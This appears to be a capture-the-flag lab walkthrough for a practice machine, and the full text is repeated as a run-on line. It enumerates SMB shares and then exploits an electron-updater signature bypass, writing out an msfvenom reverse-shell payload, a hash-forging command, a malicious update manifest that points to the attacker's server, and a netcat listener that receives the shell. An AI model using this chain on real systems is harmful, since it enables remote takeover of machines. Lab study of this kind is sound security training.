2 :139 :445 smb

$ nmap -p 139,445 --script=smb-enum-shares.nse,smb-enum-users.nse 10.10.10.237
Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-01 15:21 PDT
Nmap scan report for 10.10.10.237
Host is up (0.072s latency).

PORT    STATE    SERVICE
139/tcp filtered netbios-ssn
445/tcp open     microsoft-ds

Host script results:
| smb-enum-shares:
|   account_used: guest
|   \\10.10.10.237\ADMIN$:
|     Type: STYPE_DISKTREE_HIDDEN
|     Comment: Remote Admin
|     Anonymous access: <none>
|     Current user access: <none>
|   \\10.10.10.237\C$:
|     Type: STYPE_DISKTREE_HIDDEN
|     Comment: Default share
|     Anonymous access: <none>
|     Current user access: <none>
|   \\10.10.10.237\IPC$:
|     Type: STYPE_IPC_HIDDEN
|     Comment: Remote IPC
|     Anonymous access: <none>
|     Current user access: READ/WRITE
|   \\10.10.10.237\Software_Updates:
|     Type: STYPE_DISKTREE
|     Comment:
|     Anonymous access: <none>
|_    Current user access: READ/WRITE

Nmap done: 1 IP address (1 host up) scanned in 39.90 seconds

$ smbclient //10.10.10.237/Software_Updates
Enter WORKGROUP\kashz's password:
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Sat May  1 15:36:52 2021
  ..                                  D        0  Sat May  1 15:36:52 2021
  client1                             D        0  Sat May  1 15:35:46 2021
  client2                             D        0  Sat May  1 15:35:46 2021
  client3                             D        0  Sat May  1 15:35:46 2021
  UAT_Testing_Procedures.pdf          A    35202  Fri Apr  9 04:18:08 2021
 
 
http://10.10.10.237/releases/heed_setup_v1.0.0.zip
contains .exe installer

UAT_Testing_Procedures.pdf
Note taking application built with electron-builder
There’s no server interaction when creating notes. = no need to reverse engineer the binary
To initiate the QA process, just place the updates in one of the "client" folders, and the appropriate QA team will test it to ensure it finds an update and installs it correctly = we can try getting reverse shell using this

Electron builder exploit on Google takes us to https://blog.doyensec.com/2020/02/24/electron-updater-update-signature-bypass.html
RCE can be easily achieved by using a filename containing a single quote and then by recalculating the file hash to match the attacker-provided binary (using shasum -a 512 maliciousupdate.exe | cut -d " " -f1 | xxd -r -p | base64).

# generating shell using msfvenom with a single quote in filename
$ msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.15 LPORT=6969 -e "x86/shikata_ga_nai" -f exe -o "r'evx.exe"
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 351 (iteration=0)
x86/shikata_ga_nai chosen with final size 351
Payload size: 351 bytes
Final size of exe file: 73802 bytes
Saved as: r'evx.exe

# generating shasum
$ shasum -a 512 "r'evx.exe"| cut -d " " -f 1 | xxd -r -p | base64
fA8Brc+usPtwvAHR64r8b+A1eedKvJg5egb1eeTl3XrJLbPdTvIyG2zvbDLWQ9iP3WFvevshJ42C4Pa57E6etA==

$ file "heedv1 Setup 1.0.0.exe"
heedv1 Setup 1.0.0.exe: PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive

# creating latest.yaml file
version: 1.1.0
path: http://10.10.14.15/r'evx.exe
sha512: fA8Brc+usPtwvAHR64r8b+A1eedKvJg5egb1eeTl3XrJLbPdTvIyG2zvbDLWQ9iP3WFvevshJ42C4Pa57E6etA==

# put latest.yml in client1

(terminal-x)
$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.237 - - [03/May/2021 16:22:14] code 404, message File not found
10.10.10.237 - - [03/May/2021 16:22:14] "GET /r'evx.exe.blockmap HTTP/1.1" 404 -
10.10.10.237 - - [03/May/2021 16:22:14] "GET /r%27evx.exe HTTP/1.1" 200 -

(terminal-y)
$ rlwrap nc -lvnp 6969
listening on [any] 6969 ...
connect to [10.10.14.15] from (UNKNOWN) [10.10.10.237] 62563
Microsoft Windows [Version 10.0.19042.906]
(c) Microsoft Corporation. All rights reserved.

C:\WINDOWS\system32>whoami
atom\jason

Previous3 box enum jason Next1 recon

Last updated 3 years ago

$ nmap -p 139,445 --script=smb-enum-shares.nse,smb-enum-users.nse 10.10.10.237 Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-01 15:21 PDT Nmap scan report for 10.10.10.237 Host is up (0.072s latency). PORT STATE SERVICE 139/tcp filtered netbios-ssn 445/tcp open microsoft-ds Host script results: | smb-enum-shares: | account_used: guest | \\10.10.10.237\ADMIN$: | Type: STYPE_DISKTREE_HIDDEN | Comment: Remote Admin | Anonymous access: <none> | Current user access: <none> | \\10.10.10.237\C$: | Type: STYPE_DISKTREE_HIDDEN | Comment: Default share | Anonymous access: <none> | Current user access: <none> | \\10.10.10.237\IPC$: | Type: STYPE_IPC_HIDDEN | Comment: Remote IPC | Anonymous access: <none> | Current user access: READ/WRITE | \\10.10.10.237\Software_Updates: | Type: STYPE_DISKTREE | Comment: | Anonymous access: <none> |_ Current user access: READ/WRITE Nmap done: 1 IP address (1 host up) scanned in 39.90 seconds $ smbclient //10.10.10.237/Software_Updates Enter WORKGROUP\kashz's password: Try "help" to get a list of possible commands. smb: \> dir . D 0 Sat May 1 15:36:52 2021 .. D 0 Sat May 1 15:36:52 2021 client1 D 0 Sat May 1 15:35:46 2021 client2 D 0 Sat May 1 15:35:46 2021 client3 D 0 Sat May 1 15:35:46 2021 UAT_Testing_Procedures.pdf A 35202 Fri Apr 9 04:18:08 2021 http://10.10.10.237/releases/heed_setup_v1.0.0.zip contains .exe installer UAT_Testing_Procedures.pdf Note taking application built with electron-builder There’s no server interaction when creating notes. = no need to reverse engineer the binary To initiate the QA process, just place the updates in one of the "client" folders, and the appropriate QA team will test it to ensure it finds an update and installs it correctly = we can try getting reverse shell using this Electron builder exploit on Google takes us to https://blog.doyensec.com/2020/02/24/electron-updater-update-signature-bypass.html RCE can be easily achieved by using a filename containing a single quote and then by recalculating the file hash to match the attacker-provided binary (using shasum -a 512 maliciousupdate.exe | cut -d " " -f1 | xxd -r -p | base64). # generating shell using msfvenom with a single quote in filename $ msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.15 LPORT=6969 -e "x86/shikata_ga_nai" -f exe -o "r'evx.exe" [-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload [-] No arch selected, selecting arch: x86 from the payload Found 1 compatible encoders Attempting to encode payload with 1 iterations of x86/shikata_ga_nai x86/shikata_ga_nai succeeded with size 351 (iteration=0) x86/shikata_ga_nai chosen with final size 351 Payload size: 351 bytes Final size of exe file: 73802 bytes Saved as: r'evx.exe # generating shasum $ shasum -a 512 "r'evx.exe"| cut -d " " -f 1 | xxd -r -p | base64 fA8Brc+usPtwvAHR64r8b+A1eedKvJg5egb1eeTl3XrJLbPdTvIyG2zvbDLWQ9iP3WFvevshJ42C4Pa57E6etA== $ file "heedv1 Setup 1.0.0.exe" heedv1 Setup 1.0.0.exe: PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive # creating latest.yaml file version: 1.1.0 path: http://10.10.14.15/r'evx.exe sha512: fA8Brc+usPtwvAHR64r8b+A1eedKvJg5egb1eeTl3XrJLbPdTvIyG2zvbDLWQ9iP3WFvevshJ42C4Pa57E6etA== # put latest.yml in client1 (terminal-x) $ python3 -m http.server 80 Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ... 10.10.10.237 - - [03/May/2021 16:22:14] code 404, message File not found 10.10.10.237 - - [03/May/2021 16:22:14] "GET /r'evx.exe.blockmap HTTP/1.1" 404 - 10.10.10.237 - - [03/May/2021 16:22:14] "GET /r%27evx.exe HTTP/1.1" 200 - (terminal-y) $ rlwrap nc -lvnp 6969 listening on [any] 6969 ... connect to [10.10.14.15] from (UNKNOWN) [10.10.10.237] 62563 Microsoft Windows [Version 10.0.19042.906] (c) Microsoft Corporation. All rights reserved. C:\WINDOWS\system32>whoami atom\jason